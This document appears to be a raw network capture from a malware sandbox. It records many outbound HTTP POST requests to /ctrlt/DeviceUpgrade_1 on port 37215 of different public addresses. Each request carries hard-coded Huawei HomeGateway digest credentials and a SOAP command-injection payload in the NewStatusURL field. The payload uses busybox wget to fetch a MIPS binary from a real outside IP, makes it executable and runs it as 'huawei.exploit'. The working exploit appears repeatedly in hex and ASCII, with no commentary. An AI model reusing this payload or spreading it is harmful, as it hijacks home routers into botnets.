                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            974192.168.2.1341780156.227.173.18037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.405121088 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            975192.168.2.133709841.179.199.7237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.407413006 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            976192.168.2.1339860156.100.3.21137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.409434080 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            977192.168.2.1352774156.129.80.19437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.411464930 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            978192.168.2.134897841.224.161.2337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.412775993 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            979192.168.2.1340392156.244.147.18137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.414189100 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            980192.168.2.134227441.98.1.15737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.415961027 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            981192.168.2.1345810156.161.141.9037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.417367935 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            982192.168.2.135322441.59.211.22237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.419106007 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            983192.168.2.1352834197.26.173.6937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.420569897 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 